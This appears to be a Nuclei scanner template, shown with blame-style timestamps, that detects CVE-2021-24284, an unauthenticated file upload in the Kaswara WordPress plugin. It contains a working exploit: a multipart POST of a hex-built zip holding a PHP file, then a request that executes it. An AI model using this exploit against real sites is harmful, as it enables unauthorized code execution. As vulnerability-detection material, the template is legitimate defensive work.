2022-07-20 10:34:47 +00:00
id : CVE-2021-24284
info :
2022-10-10 19:22:59 +00:00
name : WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload
2022-07-20 10:34:47 +00:00
author : lamscun,pussycat0x,pdteam
severity : critical
description : |
2022-10-10 19:22:59 +00:00
WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress website.
2023-09-06 12:09:01 +00:00
remediation : |
Update to the latest version of Kaswara Modern VC Addons plugin (>=3.0.2) to mitigate this vulnerability.
2022-07-20 10:34:47 +00:00
reference :
- https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5
2022-07-20 11:13:54 +00:00
- https://github.com/advisories/GHSA-wqvg-8q49-hjc7
2022-07-20 10:34:47 +00:00
- https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/
- https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/
- https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/
2022-07-20 11:13:54 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24284
2022-07-20 10:34:47 +00:00
classification :
2022-10-10 19:40:25 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-07-20 10:34:47 +00:00
cve-id : CVE-2021-24284
2022-10-10 19:40:25 +00:00
cwe-id : CWE-434
2024-01-14 13:49:27 +00:00
epss-score : 0.9676
epss-percentile : 0.99595
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : kaswara_project
product : kaswara
2023-09-06 12:09:01 +00:00
framework : wordpress
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project
2022-07-20 10:34:47 +00:00
variables :
zip_file : "{{to_lower(rand_text_alpha(6))}}"
php_file : "{{to_lower(rand_text_alpha(2))}}.php"
php_cmd : "<?php phpinfo();?>"
2023-04-27 04:28:59 +00:00
http :
2022-07-20 10:34:47 +00:00
- raw :
- |
POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=------------------------d3be34324392a708
--------------------------d3be34324392a708
Content-Disposition : form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip"
Content-Type : application/octet-stream
{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}
--------------------------d3be34324392a708
Content-Disposition : form-data; name="fontsetname"
{{zip_file}}
--------------------------d3be34324392a708
Content-Disposition : form-data; name="action"
uploadFontIcon
--------------------------d3be34324392a708--
2022-07-20 11:05:52 +00:00
- |
GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1
Host : {{Hostname}}
2022-07-20 10:34:47 +00:00
matchers-condition : and
matchers :
- type : word
2022-07-20 11:05:52 +00:00
part : body_1
2022-07-20 10:34:47 +00:00
words :
- "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"
2022-07-20 11:05:52 +00:00
- type : word
part : body_2
words :
- "phpinfo()"
2022-07-20 10:34:47 +00:00
- type : status
status :
2022-07-20 11:13:54 +00:00
- 200
2024-01-26 08:31:11 +00:00
# digest: 490a0046304402206d9b500218e0424fa6feef8e304dce74aa2561f6c4f0248ccc21dbcc1fbb4b37022058bfde31db0ab7b0c379eea70faa33b7671c2d01fdb37cbd05caa0bdb401e089:922c64590222798bb761d5b6d8e72950